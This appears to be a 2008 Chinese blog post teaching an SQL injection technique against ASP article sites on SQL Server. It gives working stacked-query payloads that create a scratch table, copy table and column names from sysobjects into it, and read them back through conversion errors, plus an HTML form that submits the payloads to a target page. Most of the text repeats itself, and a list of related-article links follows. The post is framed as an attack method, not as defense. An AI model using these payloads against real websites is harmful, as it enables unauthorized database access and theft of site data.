网站SQL脚本注入的不常见方法
2008-07-11 08:38
375 查看
全站文章系统采用FSO静态生成的HTML文件来显示,这样做的好处一来可以减轻服务器负担,提高访问速度。二是阻止SQL注入式的攻击...
文章系统原理:
全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。
攻击方法:查看源文件,里面是否有通过JS来调用页面。
如调用 <script language="javascript" src="count.asp?id=1552"></script>来更新文章的浏览次数。
我们就可以来试一下可否注入:
http://服务器域名/count.asp?id=1552’
看是否出错。如出错说明有注入漏洞,可采取正常攻击。
在本机建立一个post.htm的文件和log.txt的文本文件(用于记录用)
post.htm内容:方便输入…
复制内容到剪贴板代码:
对于SQL SERVER服务器可以这样判断:在1552后加一分号,如正常可能是SQL SERVER对于这类数据库可以先建一个表id=1552;create table aaa(aaa char(20));--
然后插入一条记录:id=1552;insert into aaa values(’test’);--
再之后枚举出他的数据表名:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);--
这是将第一个表名更新到aaa的字段处。
id=1552 and exists(select * from aaa where aaa>5)就会报错,多数情况会将表名直接读出:Microsoft OLE DB Provider for SQL Server 错误 ’80040e07’, 将 varchar 值 ’vote’ 转换为数据类型为 int 的列时发生语法错误。
/search.asp,行21
其中vote就是表名:
也可以先猜出一个表名,再把(select top 1 name from sysobjects where xtype=’u’ and status>0)的值更新到那个表的一条记录中去。通过网页显示。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>’刚才得到的表名’)。
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);--
然后id=1552 and exists(select * from aaa where aaa>5)读出第二个表,一个个的读出,直到没有为止。
读字段:
id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));--
然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));--然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名。
文章系统原理:
全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。
攻击方法:查看源文件,里面是否有通过JS来调用页面。
如调用 <script language="javascript" src="count.asp?id=1552"></script>来更新文章的浏览次数。
我们就可以来试一下可否注入:
http://服务器域名/count.asp?id=1552’
看是否出错。如出错说明有注入漏洞,可采取正常攻击。
在本机建立一个post.htm的文件和log.txt的文本文件(用于记录用)
post.htm内容:方便输入…
复制内容到剪贴板代码:
<iframe name=p src=# width=800 height=350 frameborder=0></iframe> <br> <form action=http://test.com/count.asp target=p> <input name="id" value="1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);--" style="width:750"> <input type=submit value=">>>"> <input type=hidden name=fno value="2, 3"> </form> |
然后插入一条记录:id=1552;insert into aaa values(’test’);--
再之后枚举出他的数据表名:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);--
这是将第一个表名更新到aaa的字段处。
id=1552 and exists(select * from aaa where aaa>5)就会报错,多数情况会将表名直接读出:Microsoft OLE DB Provider for SQL Server 错误 ’80040e07’, 将 varchar 值 ’vote’ 转换为数据类型为 int 的列时发生语法错误。
/search.asp,行21
其中vote就是表名:
也可以先猜出一个表名,再把(select top 1 name from sysobjects where xtype=’u’ and status>0)的值更新到那个表的一条记录中去。通过网页显示。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>’刚才得到的表名’)。
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);--
然后id=1552 and exists(select * from aaa where aaa>5)读出第二个表,一个个的读出,直到没有为止。
读字段:
id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));--
然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));--然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名。
相关文章推荐
- 网站SQL脚本注入的不常见方法
- SQL脚本注入的不常见方法概括
- SQL脚本注入的不常见方法概括
- SQL脚本注入的不常见方法概括
- SQL脚本注入的不常见方法概括!
- SQL脚本注入的不常见方法概括
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 怎样避免上线网站遭受DDOS攻击,XSS攻击,SQL漏洞,脚本注入?
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态SQL语句拼接方法,提高网站的安全性
- 简单高效防注入攻击的动态多参数、动态SQL语句拼接方法,提高网站的安全性
- SQLMAP注入教程-11种常见SQLMAP使用方法详解